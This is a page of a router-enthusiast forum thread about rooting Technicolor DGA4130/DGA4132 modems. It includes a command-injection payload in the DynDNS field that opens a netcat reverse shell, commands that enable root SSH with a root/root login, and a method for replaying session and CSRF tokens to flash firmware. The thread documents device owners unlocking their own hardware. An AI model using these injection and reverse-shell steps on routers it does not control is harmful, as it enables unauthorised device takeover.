Kitz ADSL Broadband Information
adsl spacer  
Support this site
Home Broadband ISPs Tech Routers Wiki Forum
 
     
   Compare ISP   Rate your ISP
   Glossary   Glossary
 
Please login or register.

Login with username, password and session length
Advanced search  

News:

Pages: 1 ... 27 28 [29] 30 31 ... 79

Author Topic: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)  (Read 138957 times)

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #420 on: January 05, 2018, 06:54:24 AM »

hi !
Looks like the DGA4132 (AGTHP) can be unlocked too  ;D
https://www.ilpuntotecnicoeadsl.com/forum/index.php/topic,78129.msg227276.html#msg227276
the vulnerable field in the GUI is the username in the Mobile tab.


But actually i can't get it to work  >:(

EDIT:
ok so the exploit is executed on the modem when you insert the USB 3g/4g key, and you must have a working sim card in it.
« Last Edit: January 05, 2018, 10:28:49 AM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

Lil-Koby

  • Member
  • **
  • Posts: 92
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #421 on: January 05, 2018, 01:08:55 PM »

That would be some good news, but the provided link doesn't work for me.
Quote
An Error Has Occurred!
The topic or board you are looking for appears to be either missing or off limits to you.
Btw, is it the exact same hardware (CPU,WLAN,RAM) as the DGA4130 ? The only difference is the extra SFP port ?
Logged
DGA4130@bridge, fw 1.1.0, GUI: 7.17.3 <3
DGA4132@bridge, fw 1.1.0, GUI: 8.1.2 <3
Archer C2600@LEDE 18.06.1

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #422 on: January 05, 2018, 03:53:11 PM »

yes !

Actualy i can't test, i have a 3G key locked with an operator i'm not with anymore...if the key is not connecting to your ISP the pppd service is not started and the exploit is not executed...
i think this exploit should still work on the DGA4130 too, with firmware 1.04+ :)
« Last Edit: January 05, 2018, 03:58:28 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

surrealiz3

  • Just arrived
  • *
  • Posts: 12
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #423 on: January 05, 2018, 05:26:35 PM »

epic

thanks :)
Logged

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #424 on: January 05, 2018, 06:06:42 PM »

i unlocked my usb key and now i can access internet with it  ;D
but unfortunately, i can't make the exploit working...  >:( >:( >:(

Edit:
looks like the exploit works with the usb key HUAWEI E392:
https://www.amazon.fr/Huawei-E392-LTE-USB-Surfstick/dp/B0085C6IY2/

But not with:
ZTE K3565-Z
Huawei K4505

...

it's probably a matter of syntax with the driver command ?!
« Last Edit: January 05, 2018, 08:10:23 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #425 on: January 06, 2018, 08:17:14 PM »

Ok so this time we got it !!!  :cool:



It works in the DGA4132 !! so we can root it as well  :D  :D
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

Lil-Koby

  • Member
  • **
  • Posts: 92
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #426 on: January 06, 2018, 10:13:14 PM »

 :thumbs: :thumbs: :clap: :clap:
Did you manage to get it work through DynDNS ?
So no need for a USB-stick ?
Logged
DGA4130@bridge, fw 1.1.0, GUI: 7.17.3 <3
DGA4132@bridge, fw 1.1.0, GUI: 8.1.2 <3
Archer C2600@LEDE 18.06.1

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #427 on: January 06, 2018, 10:33:58 PM »

:thumbs: :thumbs: :clap: :clap:
Did you manage to get it work through DynDNS ?
So no need for a USB-stick ?
YES !!!!!  ;D  ;D i can confirm, it works on my DGA4132 firmware 1.0.3 ( Technicolor 17.1)
it should work on the DGA4130 too.

So no need for a USB-stick ?
No, this is another exploit too complicated to set up :)
« Last Edit: January 06, 2018, 10:56:41 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #428 on: January 06, 2018, 10:49:29 PM »

As the unlocker tool is not working for this exploit, you have to use netcat on your PC.
For windows: https://eternallybored.org/misc/netcat/
Linux users already have it.

So in a command shell type : nc -lvvp 1337 to listen to the port 1337
now let's say your PC iP is : 192.168.1.10
in the dyndns tile, in the domain field type this : test.com;nc 192.168.1.10 1337 -e /bin/sh &
Enable the dyndns service, and click Save.


Now in your command shell you should see this :


You have the root access now  :) so let's enable SSH :
Quote
sed -i 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd

and restart dropbear:
Quote
/etc/init.d/dropbear restart



Now you can access your modem with SSH as root (user/pass root/root)

 
« Last Edit: January 06, 2018, 10:53:22 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

Lil-Koby

  • Member
  • **
  • Posts: 92
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #429 on: January 06, 2018, 11:21:36 PM »

Awesome News !! :dance::dance::dance: :love:
Now i have to get myself another DGA modem... ;)

Maybe you should open a fresh thread about this device.
I've also spotted a new thread with a guide on how to downgrade "any" firmware version (without root or serial), it would be great to write down the steps in english !
Logged
DGA4130@bridge, fw 1.1.0, GUI: 7.17.3 <3
DGA4132@bridge, fw 1.1.0, GUI: 8.1.2 <3
Archer C2600@LEDE 18.06.1

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #430 on: January 07, 2018, 01:17:45 PM »

How to upgrade/downgrade your firmware on DGA413x even if the modem is not rooted.
this is the Teddyraspin76 method, all credits to him  :)
In this tutorial my DGA413x IP is 192.168.1.253

First, you need Chrome or Firefox to find the sessionID and the CSRFtoken. And Postman https://www.getpostman.com/ to send the firmware to the modem.

1) With Firefox or Chrome, enable the debug mode by hitting F12
2) Go to your modem ip address and login


3) in the file list select mobiletab.lua, and now on the right, in the cookie tab you can see your sessionID

4) in the next tab called "parametters" you'll see your CSRFtoken


5) copy both values. Don't close Firefox/Chrome else we will close the session.

6) Start Postman, insert your router address : http://192.168.1.x and click SEND


7) Now click on cookies (below the SEND button). it will open a window, click on sessionID to display the cookie content.


8) Replace the value of the sessionID with the one you copied at step#5, click SAVE and close the window.
9) Now in Postman replace the GET by POST


10) Click on body


11) Add the CSRFtoken key and the value you copied at step #5


12)Below CSRFtoken add a new key called "upgradefile", and on the dropdown menu on the right, select file.


13) now click the button and select your firmware file.


14) replace the link with http://192.168.1.x/modals/gateway-modal.lp?action=upgradefw and click the SEND button.
use your modem ip address !


15) Wait the file will be sent, it will be flashed and the modem will reboot.
« Last Edit: January 07, 2018, 04:36:03 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

lofgents

  • Member
  • **
  • Posts: 32
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #431 on: January 09, 2018, 11:19:38 AM »

We have been away for a few days and unplugged the modem on return the GUI and internet were inaccessible.

I was using v1.04 of the firmware and 3.25 GUI.

I had to reset using the rear reset button which left the firmware intact and unlocked but reverted to the original GUI.

I updated to GUI 3.9 then tried to update to one of the v4 GUI using putty commands the GUI would update but when entering the Gateway tab all the fields were empty and on the initial log on screen there was no firmware version present just dashes.

I tried a different version of GUI  and after the log in screen the modem would be inaccessible again.

I have reset and reverted back to 1.03 firmware and GUI 3.9 set everything up ready to reconnect and left powered off overnight to test, this morning I could log in to the modem as normal but the modem started up in bridge mode. I am concerned something is corrupted due to inability to update to the latest GUI and powering off for a few hours the modem starts in a different mode.

Is there something I am doing incorrectly or a better procedure I should follow to resolve the problems

Thanks
         Dave

Logged

gazaai

  • Reg Member
  • ***
  • Posts: 202
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #432 on: January 09, 2018, 11:56:14 AM »

Looks like an interesting thread here!

Do you guys recommend this DGA4130 for UK use? I'm looking to replace my Billion 8800nl.

Most likely will be used in bridge mode unless the router functionality is good too.

Oh and monitoring the stats is a must, does it have any issues with telnet?

Thanks
Logged
Plusnet: 80 / 20
MDWS Username: GaZaai

Modem: Billion 8800NL (Bridge Mode)
Router + AP: NETGEAR R7800 (OpenWRT/LEDE)
APs: 2x Linksys Linksys EA6700

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #433 on: January 09, 2018, 03:49:00 PM »

... but when entering the Gateway tab all the fields were empty and on the initial log on screen there was no firmware version present just dashes.

I tried a different version of GUI  and after the log in screen the modem would be inaccessible again.

it happened to me already, when i'm hacking too much in the modem  :)
usually updating once again the GUI from putty :

bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice force

+ Reboot solves the problem.
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ

shdf

  • Reg Member
  • ***
  • Posts: 365
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #434 on: January 09, 2018, 03:53:55 PM »

For everyone, there is now a new swiss tool for the technicolor modems, which allow you to Upgrade/downgrade it (even if it is not rooted !!) it's the automated version of my post above  :)
and it can also Root your device.
Look here : http://whrl.pl/Re4rV2

So basicaly if you check "Flash Firmware?" it will flash the new Firmware + Root the device. if you don't check "Flash Firmware?" then it will only ROOT the device.



You can get the AutoFlashGui from the italian repository:
http://repository.ilpuntotecnicoeadsl.com/files/mavelot/Firmware/Tools/autoflashgui.zip

or from my Mega :
https://mega.nz/#F!3FVBVa6b!VyA03zN6oQf88ZiRJsWTbA
« Last Edit: January 09, 2018, 05:37:15 PM by shdf »
Logged
DGA4130 Firmware 1.1.0 GUI TIM unlocked
DGA4132 Firmware 1.1.0 GUI TIM unlocked
MEGA : https://mega.nz/#F!yM0RkJjT!I7Y8-mreSHLUW7uPuZtZgQ
Pages: 1 ... 27 28 [29] 30 31 ... 79